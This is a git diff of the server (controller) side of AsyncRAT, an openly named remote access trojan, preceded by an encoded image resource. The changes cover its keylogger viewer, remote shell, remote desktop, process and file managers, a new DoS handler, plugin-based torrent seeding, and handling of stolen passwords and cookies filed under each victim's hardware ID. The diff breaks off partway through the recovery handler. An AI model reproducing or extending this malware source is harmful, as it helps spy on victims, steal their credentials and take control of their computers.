+ A9AB/wPQAf8D0AH/A9EB/wPSAf8D0gH/A9IB/wPSAf8D0wH/A9MB/wPhAf8D5AH/A9IB/wOJAf8D0gH/
+ A9EB/wPRAf8D0QH/A9AB/wPPAf8DzwH/A6AB/wPNAf8DzAH/A8oB/wPIAf8DxgH/A8QB/wO+Af8DGwEm
+ AwQBBigAA1QBpgPjAf8D4wH/A+MB/wPhAf8D4AH/A+AB/wPfAf8D3wH/A94B/wPdAf8D3QH/A9wB/wPb
+ Af8D2AH/A8gB/wPEAf8DxgH/A8EB/wPMAf8D1AH/A9MB/wPSAf8D0QH/A9AB/wPOAf8DzgH/A80B/wPL
+ Af8DywH/A8kB/wPIAf8DxwH/A1sBywMYASH0AANQAZoBZQF2AXoB8AGKAeIB/QH/AZIB4gH7Af8BlgHZ
+ Ae0B/wFgAb8B1wH/AWkBzQHtAf8BhQHWAfcB/wGGAdcB+QH/AYYB1wH5Af8BhgHXAfkB/wGGAdcB+QH/
+ AYYB1wH5Af8BhwHXAfgB/wGKAdcB+AH/AZQB2wH5Af8BmAHcAfkB/wGEAcYB4gH+AZYBuAHCAf0BagGH
+ AYkB+QFgAmIB7wNhAdoDWQG+A1ABnQNBAXIDMAFLAxwBJwMHAQkDAAEBQAADBQEHAx4BKwOqAf4DwQH/
+ A8MB/wPEAf8DrAH/A8kB/wPKAf8DywH/A8wB/wPNAf8DzgH/A84B/wPOAf8DzwH/A88B/wPPAf8DzwH/
+ A9AB/wPQAf8DxQH/A88B/wOIAf8DpAH/A84B/wPOAf8DzgH/A80B/wPMAf8DywH/A54B/wPJAf8DyAH/
+ A8UB/wPDAf8DwgH/A8AB/wOpAf8DGAEhAwQBBSgAA0IBcwPjAf8D5AH/A+MB/wPjAf8D4gH/A+IB/wPh
+ Af8D4AH/A+AB/wPfAf8D3wH/A94B/wPdAf8D3AH/A9kB/wPFAf8DwQH/A80B/wPYAf8D1wH/A9YB/wPU
+ Af8D0wH/A9IB/wPRAf8D0QH/A9AB/wPOAf8DzQH/A8wB/wPKAf8DygH/A1YBsQMFAQf0AANQAZoBZgF0
+ AXkB8AGWAdsB8wH/AX8BrAG/Af4BcAGaAbEB/AFuAZUBoAH6AWgBggGJAfUBYgFyAXoB7wFjAWoBbgHo
+ AWEBZAFlAeICXwFhAdsDYAHWA1wBzAFZAloBvQNUAasDTAGTA0QBeQM4AV4DMAFLAycBOgMfAS0DHAEn
+ AxcBIAMTARoDDgETAwoBDQMFAQcDAAEBRAADBAEGAxoBJQOkAf4DvQH/A78B/wPAAf8DtwH/A54B/wOf
+ Af8DogH/A6YB/wOqAf8DrgH/A7EB/wO1Af8DtwH/A7kB/wO7Af8DuwH/A7oB/wO5Af8DxwH/A8oB/wO4
+ Af8DmwH/A8EB/wPAAf8DwAH/A78B/wO/Af8DugH/A6EB/wPDAf8DwgH/A8AB/wO/Af8DvQH/A7sB/wOL
+ Af8DFAEcAwMBBCgAAy4BSAOAAfED4wH/A+MB/wPjAf8D4wH/A+MB/wPiAf8D4gH/A+EB/wPhAf8D4AH/
+ A98B/wPeAf8D3gH/A90B/wPZAf8D0AH/A9sB/wPZAf8D2AH/A9cB/wPXAf8D1gH/A9UB/wPUAf8D0wH/
+ A9IB/wPQAf8D0AH/A84B/wPNAf8DzQH/A0cBgPgAA0kBhwNdAdMDYQHcA14B1QNcAcwDWQG/A1YBqwNO
+ AZQDRAF5AzoBYAMvAUoDJgE5AyABLgMbASYDFwEgAxMBGgMPARQDCgENAwYBCAMDAQQDAAEBAwABAVwA
+ AwMBBAMTARoDhwH+A8IB/wPOAf8DzQH/A70B/wPMAf8D5wH/AeUC5gH/AckCygH/A98B/wPRAf8BvwLA
+ Af8B0wLUAf8BxgLHAf8B2wLdAf8B0QLSAf8DtwH/AcMCxAH/AdwC3QH/AdwC3QH/Ac0CzgH/A8cB/wO0
+ Af8DuwH/A7wB/wO7Af8DugH/A7kB/wO1Af8DuAH/A78B/wO+Af8DvAH/A9AB/wPFAf8DwgH/A2kB/wMP
+ ARQDAQECKAADEAEVA1ABmwPiAf8D4wH/A+MB/wPkAf8D4wH/A+MB/wPjAf8D4wH/A+IB/wPiAf8D4QH/
+ A+AB/wPfAf8D3wH/A90B/wPdAf8D3QH/A9sB/wPaAf8D2QH/A9kB/wPYAf8D1wH/A9YB/wPVAf8D1AH/
+ A9IB/wPSAf8D0QH/A6oB/gNaAcADGAEi+AADHAEoAywBQwMhATADEwEaAwcBCgMAAQGfAAEBAwgBCwNo
+ Af4DlgH/A2wB/wOBAf8DugH/A8cB/wP9Af8B+wL8Af8B+QL6Af8D+AH/AfYC9wH/AfQC9QH/AfIC9AH/
+ AfEC8wH/Ae8C8QH/Ae8C8QH/Ae4C8AH/Ae4C8AH/Ae0C7wH/Ae0C7wH/Ac8C0AH/A8IB/wPCAf8DwQH/
+ A8AB/wPAAf8DvwH/A74B/wO9Af8DvAH/A7sB/wO6Af8DuwH/AyAB/wOTAf8DswH/A1sBxAMGAQgDAAEB
+ MAADGwEmAzgBXAM5AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5
+ AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5AV8DOQFfAzkBXwM5AV8DOQFfAzgBXQMj
+ ATP/AAEAAwUBBwMIAQsDBgEIAwQBBQMBAQKkAAMBAQIDTAGTA1MBqgNWAasDVgGrA1YBqwNWAasDVgGr
+ A1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNWAasDVgGr
+ A1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNWAasDVgGrA1YBqwNTAaoDDAEQ
+ AwABAf8A/wBtAAEBAwAEAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMB
+ AQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAQECAwEBAgMB
+ AQIDAQECAwEBAgMBAQIDAQECAwEBAgMBAQIDAAEB/wD/AP8A/wCcAAFCAU0BPgcAAT4DAAEoAwABwAMA
+ ATADAAEBAQABAQUAAYABBBYAA/8BAAH/AfgBPwH/Ad8B/wHgBAABAwb/BgAB/wH4AQ8B/AEBAf8BwAQA
+ AQEG/wYAAf8B+AEPAfgBAQH/AYAFAAb/BgAB/wHAAwABPwGABQAG/wYAAf8EAAE/AYAFAAHABAABAwYA
+ Af8EAAE/AYAFAAGABAABAQYAAf4EAAEPAYARAAH+BAABDwGAEQAB/gQAAQ8BgBEAAf4EAAEHAYARAAH+
+ BAABAwGAEQAB/gQAAQEBgBEAAf4EAAEBAYARAAH+BAABAQGABQABgAsAAf4EAAEHAYAFAAGACwAB/gQA
+ AQ8BgAUAAYALAAH+AwABAQH/AYAEAAEBAYAEAAEBBgAB/gMAAQEB/wGABAABAQGABAABAQYAAf4DAAEB
+ Af8BgAQAAQEBgAQAAQEGAAH+AwABBwH/AcAEAAEBAcAEAAEDBgAB/gMAAQ8B/wHABAABAQHABAABAwYA
+ Af4DAAEPAf8BwAQAAQEBwAQAAQMGAAH+AwABDwH/AcAEAAEBAcAEAAEDBgAB/gMAAQ8B/wHABAABAQHg
+ BAABBwYAAf4DAAEPAf8BwAQAAQEB4AQAAQcGAAH+AwABDwH/AcAEAAEBAeAEAAEHBgAB/gMAAQ8B/wHA
+ BAABAQHwBAABBwYAAf4DAAEPAf8BwAQAAQMB8AQAAQcGAAH+AwABDwH/AcAEAAEDAfAEAAEHBgAB/gMA
+ AQ8B/wHgBAABAwHwBAABDwYAAf4DAAEPAf8B4AQAAQMB8AQAAQ8GAAH+AwABDwH/AeAEAAEDAfAEAAEP
+ BgAB/gMAAQ8B/wHgBAABAwH4BAABHwYAAf4DAAEPAf8B4AQAAQMB+AQAAR8GAAH+AwABDwH/AeAEAAED
+ AfgEAAEfBgAB/gMAAQ8B/wHgBAABBwH4BAABHwYAAf4DAAEPAf8B4AQAAQcB/AQAAR8GAAH+AwABDwH/
+ AfAEAAEHAfwEAAE/BgAB/gMAAQ8B/wHwBAABBwH8BAABPwYAAf4DAAEPAf8B8AQAAQcB/gQAAT8GAAH+
+ AwABDwH/AfAEAAEHAf4EAAE/BgAB/gMAAQ8B/wHwBAABBwH+BAABPwYAAf4DAAEfAf8B8AQAAQcB/gQA
+ AX8GAAH+AgABBwL/AfAEAAEHAf4EAAF/BgAB/gEHBP8B8AQAAQcB/wGAAgABAQH/BgAB/gEPBP8B+AQA
+ AQ8G/wYABv8B/AQAAT8G/wYAEv8GAAs=
diff --git a/AsyncRAT-C#/Server/Forms/FormKeylogger.Designer.cs b/AsyncRAT-C#/Server/Forms/FormKeylogger.Designer.cs
index 1765746..9926860 100644
--- a/AsyncRAT-C#/Server/Forms/FormKeylogger.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormKeylogger.Designer.cs
@@ -42,7 +42,6 @@
//
// timer1
//
- this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
@@ -119,12 +118,12 @@
}
#endregion
- private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.ToolStrip toolStrip1;
private System.Windows.Forms.ToolStripLabel toolStripLabel1;
private System.Windows.Forms.ToolStripTextBox toolStripTextBox1;
private System.Windows.Forms.ToolStripSeparator toolStripSeparator1;
private System.Windows.Forms.ToolStripButton toolStripButton1;
public System.Windows.Forms.RichTextBox richTextBox1;
+ public System.Windows.Forms.Timer timer1;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormKeylogger.cs b/AsyncRAT-C#/Server/Forms/FormKeylogger.cs
index 1cb791e..63aeb3a 100644
--- a/AsyncRAT-C#/Server/Forms/FormKeylogger.cs
+++ b/AsyncRAT-C#/Server/Forms/FormKeylogger.cs
@@ -37,10 +37,16 @@ namespace Server.Forms
private void Keylogger_FormClosed(object sender, FormClosedEventArgs e)
{
Sb?.Clear();
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "keyLogger";
- msgpack.ForcePathObject("isON").AsString = "false";
- ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ if (Client != null)
+ {
+ new Thread(() =>
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("isON").AsString = "false";
+ ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ }).Start();
+ }
}
private void ToolStripTextBox1_KeyDown(object sender, KeyEventArgs e)
diff --git a/AsyncRAT-C#/Server/Forms/FormPorts.Designer.cs b/AsyncRAT-C#/Server/Forms/FormPorts.Designer.cs
index e8291d8..63b92c9 100644
--- a/AsyncRAT-C#/Server/Forms/FormPorts.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormPorts.Designer.cs
@@ -120,6 +120,7 @@
this.MinimizeBox = false;
this.Name = "FormPorts";
this.ShowInTaskbar = false;
+ this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "PortsFrm";
this.TopMost = true;
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.PortsFrm_FormClosed);
diff --git a/AsyncRAT-C#/Server/Forms/FormProcessManager.Designer.cs b/AsyncRAT-C#/Server/Forms/FormProcessManager.Designer.cs
index 815379e..8c4b489 100644
--- a/AsyncRAT-C#/Server/Forms/FormProcessManager.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormProcessManager.Designer.cs
@@ -49,9 +49,11 @@
this.lv_id});
this.listView1.ContextMenuStrip = this.contextMenuStrip1;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
+ this.listView1.Enabled = false;
this.listView1.FullRowSelect = true;
this.listView1.GridLines = true;
this.listView1.HeaderStyle = System.Windows.Forms.ColumnHeaderStyle.Nonclickable;
+ this.listView1.HideSelection = false;
this.listView1.Location = new System.Drawing.Point(0, 0);
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
@@ -104,7 +106,6 @@
//
// timer1
//
- this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
//
@@ -117,6 +118,7 @@
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Name = "FormProcessManager";
this.Text = "ProcessManager";
+ this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormProcessManager_FormClosed);
this.contextMenuStrip1.ResumeLayout(false);
this.ResumeLayout(false);
@@ -127,9 +129,9 @@
private System.Windows.Forms.ColumnHeader lv_id;
public System.Windows.Forms.ListView listView1;
public System.Windows.Forms.ImageList imageList1;
- private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.ContextMenuStrip contextMenuStrip1;
private System.Windows.Forms.ToolStripMenuItem killToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
+ public System.Windows.Forms.Timer timer1;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormProcessManager.cs b/AsyncRAT-C#/Server/Forms/FormProcessManager.cs
index d2b5265..23a2706 100644
--- a/AsyncRAT-C#/Server/Forms/FormProcessManager.cs
+++ b/AsyncRAT-C#/Server/Forms/FormProcessManager.cs
@@ -17,6 +17,7 @@ namespace Server.Forms
{
public Form1 F { get; set; }
internal Clients Client { get; set; }
+ internal Clients ParentClient { get; set; }
public FormProcessManager()
{
@@ -28,7 +29,7 @@ namespace Server.Forms
{
try
{
- if (!Client.TcpClient.Connected) this.Close();
+ if (!Client.TcpClient.Connected || !ParentClient.TcpClient.Connected) this.Close();
}
catch { this.Close(); }
}
@@ -61,5 +62,14 @@ namespace Server.Forms
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
});
}
+
+ private void FormProcessManager_FormClosed(object sender, FormClosedEventArgs e)
+ {
+ try
+ {
+ Client?.Disconnected();
+ }
+ catch { }
+ }
}
}
diff --git a/AsyncRAT-C#/Server/Forms/FormRemoteDesktop.cs b/AsyncRAT-C#/Server/Forms/FormRemoteDesktop.cs
index b0e5c67..377625d 100644
--- a/AsyncRAT-C#/Server/Forms/FormRemoteDesktop.cs
+++ b/AsyncRAT-C#/Server/Forms/FormRemoteDesktop.cs
@@ -44,7 +44,7 @@ namespace Server.Forms
{
try
{
- if (!ParentClient.TcpClient.Connected) this.Close();
+ if (!ParentClient.TcpClient.Connected || !Client.TcpClient.Connected) this.Close();
}
catch { this.Close(); }
}
@@ -87,7 +87,7 @@ namespace Server.Forms
msgpack.ForcePathObject("Quality").AsInteger = Convert.ToInt32(numericUpDown1.Value.ToString());
msgpack.ForcePathObject("Screen").AsInteger = Convert.ToInt32(numericUpDown2.Value.ToString());
decoder = new UnsafeStreamCodec(Convert.ToInt32(numericUpDown1.Value));
- ThreadPool.QueueUserWorkItem(ParentClient.Send, msgpack.Encode2Bytes());
+ ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
numericUpDown1.Enabled = false;
numericUpDown2.Enabled = false;
btnSave.Enabled = true;
@@ -100,8 +100,10 @@ namespace Server.Forms
button1.Tag = (object)"play";
try
{
- Client.Disconnected();
- Client = null;
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
+ msgpack.ForcePathObject("Option").AsString = "stop";
+ ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
}
catch { }
numericUpDown1.Enabled = true;
diff --git a/AsyncRAT-C#/Server/Forms/FormShell.Designer.cs b/AsyncRAT-C#/Server/Forms/FormShell.Designer.cs
index dedcf8c..c3950e5 100644
--- a/AsyncRAT-C#/Server/Forms/FormShell.Designer.cs
+++ b/AsyncRAT-C#/Server/Forms/FormShell.Designer.cs
@@ -66,7 +66,6 @@
//
// timer1
//
- this.timer1.Enabled = true;
this.timer1.Interval = 1000;
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
//
@@ -101,7 +100,7 @@
#endregion
private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1;
- private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
+ public System.Windows.Forms.Timer timer1;
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Server/Forms/FormShell.cs b/AsyncRAT-C#/Server/Forms/FormShell.cs
index cc3023a..3b4946d 100644
--- a/AsyncRAT-C#/Server/Forms/FormShell.cs
+++ b/AsyncRAT-C#/Server/Forms/FormShell.cs
@@ -26,6 +26,7 @@ namespace Server.Forms
private void TextBox1_KeyDown(object sender, KeyEventArgs e)
{
+ if (Client != null)
if (e.KeyData == Keys.Enter && !string.IsNullOrWhiteSpace(textBox1.Text))
{
if (textBox1.Text == "cls".ToLower())
@@ -64,10 +65,11 @@ namespace Server.Forms
private void ExitShell()
{
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "shellWriteInput";
- msgpack.ForcePathObject("WriteInput").AsString = "exit";
- ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
+ try
+ {
+ Client?.Disconnected();
+ }
+ catch { }
}
}
}
diff --git a/AsyncRAT-C#/Server/Forms/FormTorrent.cs b/AsyncRAT-C#/Server/Forms/FormTorrent.cs
index c919bb8..00b6d62 100644
--- a/AsyncRAT-C#/Server/Forms/FormTorrent.cs
+++ b/AsyncRAT-C#/Server/Forms/FormTorrent.cs
@@ -11,6 +11,7 @@ using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
+using Server.Algorithm;
namespace Server.Forms
{
@@ -48,10 +49,18 @@ namespace Server.Forms
try
{
if (!IsOk) return;
+ MsgPack packet = new MsgPack();
+ packet.ForcePathObject("Packet").AsString = "torrent";
+ packet.ForcePathObject("Option").AsString = "seed";
+ packet.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(textBox1.Text));
+
MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "torrent";
- msgpack.ForcePathObject("Option").AsString = "seed";
- msgpack.ForcePathObject("File").SetAsBytes(File.ReadAllBytes(textBox1.Text));
+ msgpack.ForcePathObject("Packet").AsString = "plugin";
+ msgpack.ForcePathObject("Dll").AsString = (GetHash.GetChecksum(@"Plugins\Miscellaneous.dll"));
+
+ msgpack.ForcePathObject("Msgpack").SetAsBytes(packet.Encode2Bytes());
+
+
foreach (ListViewItem itm in Program.form1.listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleChat.cs b/AsyncRAT-C#/Server/Handle Packet/HandleChat.cs
index e2e1304..435a2e1 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleChat.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleChat.cs
@@ -13,21 +13,41 @@ namespace Server.Handle_Packet
{
public class HandleChat
{
- public HandleChat(MsgPack unpack_msgpack, Clients client)
+ public void Read(MsgPack unpack_msgpack, Clients client)
{
- FormChat chat = (FormChat)Application.OpenForms["chat:" + client.ID];
+ try
+ {
+ FormChat chat = (FormChat)Application.OpenForms["chat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
+ if (chat != null)
+ {
+ Console.Beep();
+ chat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("WriteInput").AsString);
+ chat.richTextBox1.SelectionStart = chat.richTextBox1.TextLength;
+ chat.richTextBox1.ScrollToCaret();
+ }
+ else
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "chatExit";
+ ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ client.Disconnected();
+ }
+ }
+ catch { }
+ }
+
+ public void GetClient(MsgPack unpack_msgpack, Clients client)
+ {
+ FormChat chat = (FormChat)Application.OpenForms["chat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (chat != null)
{
- Console.Beep();
- chat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("WriteInput").AsString);
- chat.richTextBox1.SelectionStart = chat.richTextBox1.TextLength;
- chat.richTextBox1.ScrollToCaret();
- }
- else
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "chatExit";
- ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
+ if (chat.Client == null)
+ {
+ chat.Client = client;
+ chat.textBox1.Enabled = true;
+ chat.timer1.Enabled = true;
+ }
+
}
}
}
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleDos.cs b/AsyncRAT-C#/Server/Handle Packet/HandleDos.cs
new file mode 100644
index 0000000..b6c3570
--- /dev/null
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleDos.cs
@@ -0,0 +1,29 @@
+using Server.Connection;
+using Server.Forms;
+using Server.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+using System.Windows.Forms;
+
+namespace Server.Handle_Packet
+{
+ class HandleDos
+ {
+ public void Add(Clients client, MsgPack unpack_msgpack)
+ {
+ try
+ {
+ FormDOS DOS = (FormDOS)Application.OpenForms["DOS"];
+ if (DOS != null)
+ {
+ lock (DOS.sync)
+ DOS.PlguinClients.Add(client);
+ }
+ }
+ catch { }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/Server/Handle Packet/HandleFileManager.cs
index 3e7953e..94eb38e 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleFileManager.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleFileManager.cs
@@ -22,9 +22,24 @@ namespace Server.Handle_Packet
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
+
+ case "setClient":
+ {
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
+ if (FM != null)
+ {
+ if (FM.Client == null)
+ {
+ client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
+ FM.Client = client;
+ FM.timer1.Enabled = true;
+ }
+ }
+ break;
+ }
case "getDrivers":
{
- FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
FM.toolStripStatusLabel1.Text = "";
@@ -50,7 +65,7 @@ namespace Server.Handle_Packet
case "getPath":
{
- FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
FM.toolStripStatusLabel1.Text = unpack_msgpack.ForcePathObject("CurrentPath").AsString;
@@ -105,7 +120,7 @@ namespace Server.Handle_Packet
case "error":
{
- FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + client.ID];
+ FormFileManager FM = (FormFileManager)Application.OpenForms["fileManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
FM.listView1.Enabled = true;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleKeylogger.cs b/AsyncRAT-C#/Server/Handle Packet/HandleKeylogger.cs
index c34cf36..ea9c2e6 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleKeylogger.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleKeylogger.cs
@@ -15,22 +15,26 @@ namespace Server.Handle_Packet
{
try
{
- FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + client.ID];
- if (KL != null)
- {
- KL.Sb.Append(unpack_msgpack.ForcePathObject("Log").GetAsString());
- KL.richTextBox1.Text = KL.Sb.ToString();
- KL.richTextBox1.SelectionStart = KL.richTextBox1.TextLength;
- KL.richTextBox1.ScrollToCaret();
- }
- else
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "keyLogger";
- msgpack.ForcePathObject("isON").AsString = "false";
- client.Send(msgpack.Encode2Bytes());
+ FormKeylogger KL = (FormKeylogger)Application.OpenForms["keyLogger:" + unpack_msgpack.ForcePathObject("Hwid").GetAsString()];
+ if (KL != null)
+ {
+ if (KL.Client == null)
+ {
+ KL.Client = client;
+ KL.timer1.Enabled = true;
+ }
+ KL.Sb.Append(unpack_msgpack.ForcePathObject("Log").GetAsString());
+ KL.richTextBox1.Text = KL.Sb.ToString();
+ KL.richTextBox1.SelectionStart = KL.richTextBox1.TextLength;
+ KL.richTextBox1.ScrollToCaret();
+ }
+ else
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("isON").AsString = "false";
+ client.Send(msgpack.Encode2Bytes());
}
-
}
catch { }
}
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
index 5fcef69..cf2f77b 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
@@ -4,7 +4,6 @@ using Server.Connection;
using cGeoIp;
using System.Drawing;
using System.Windows.Forms;
-using System.Threading.Tasks;
namespace Server.Handle_Packet
{
@@ -14,6 +13,12 @@ namespace Server.Handle_Packet
{
try
{
+ try
+ {
+ client.CheckPlugin();
+ }
+ catch { }
+
client.LV = new ListViewItem();
client.LV.Tag = client;
client.LV.Text = string.Format("{0}:{1}", client.TcpClient.RemoteEndPoint.ToString().Split(':')[0], client.TcpClient.LocalEndPoint.ToString().Split(':')[1]);
@@ -34,6 +39,7 @@ namespace Server.Handle_Packet
client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine;
client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
+
lock (Settings.LockListviewClients)
{
Program.form1.listView1.Items.Add(client.LV);
@@ -46,9 +52,10 @@ namespace Server.Handle_Packet
{client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} : {client.TcpClient.LocalEndPoint.ToString().Split(':')[1]}";
Program.form1.notifyIcon1.ShowBalloonTip(100);
}
+
+ new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} connected", Color.Green);
}
catch { }
- new HandleLogs().Addmsg($"Client {client.TcpClient.RemoteEndPoint.ToString().Split(':')[0]} connected successfully", Color.Green);
}
public void Received(Clients client)
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleLogs.cs b/AsyncRAT-C#/Server/Handle Packet/HandleLogs.cs
index f07bdf6..521e48e 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleLogs.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleLogs.cs
@@ -18,6 +18,7 @@ namespace Server.Handle_Packet
LV.Text = DateTime.Now.ToLongTimeString();
LV.SubItems.Add(Msg);
LV.ForeColor = color;
+
lock (Settings.LockListviewLogs)
{
Program.form1.listView2.Items.Insert(0, LV);
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
index fced62b..b393639 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
@@ -11,7 +11,6 @@ namespace Server.Handle_Packet
{
try
{
-
lock (Settings.LockListviewClients)
if (client.LV != null)
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleProcessManager.cs b/AsyncRAT-C#/Server/Handle Packet/HandleProcessManager.cs
index f863629..776fdb0 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleProcessManager.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleProcessManager.cs
@@ -14,9 +14,15 @@ namespace Server.Handle_Packet
{
try
{
- FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + client.ID];
+ FormProcessManager PM = (FormProcessManager)Application.OpenForms["processManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (PM != null)
{
+ if (PM.Client == null)
+ {
+ PM.Client = client;
+ PM.listView1.Enabled = true;
+ PM.timer1.Enabled = true;
+ }
PM.listView1.Items.Clear();
string processLists = unpack_msgpack.ForcePathObject("Message").AsString;
string[] _NextProc = processLists.Split(new[] { "-=>" }, StringSplitOptions.None);
diff --git a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs
index a351e83..3e382a6 100644
--- a/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs
+++ b/AsyncRAT-C#/Server/Handle Packet/HandleRecovery.cs
@@ -17,15 +17,15 @@ namespace Server.Handle_Packet
{
try
{
- string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID + "\\Recovery");
+ string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder\\" + unpack_msgpack.ForcePathObject("Hwid").AsString + "\\Recovery");
string pass = unpack_msgpack.ForcePathObject("Password").AsString;
- string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString;
- if (!string.IsNullOrWhiteSpace(pass) || !string.IsNullOrWhiteSpace(cookies))
+ //string cookies = unpack_msgpack.ForcePathObject("Cookies").AsString;
